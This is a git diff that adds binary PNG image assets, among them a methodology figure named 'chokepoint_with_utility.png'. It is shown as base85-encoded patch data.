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

literal 0
HcmV?d00001

diff --git a/src/assets/methodology/chokepoint_with_utility.png b/src/assets/methodology/chokepoint_with_utility.png
new file mode 100644
index 0000000000000000000000000000000000000000..b892a09c0a00ff589bb1f82a218c843d4f3e4366
GIT binary patch
literal 208068
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
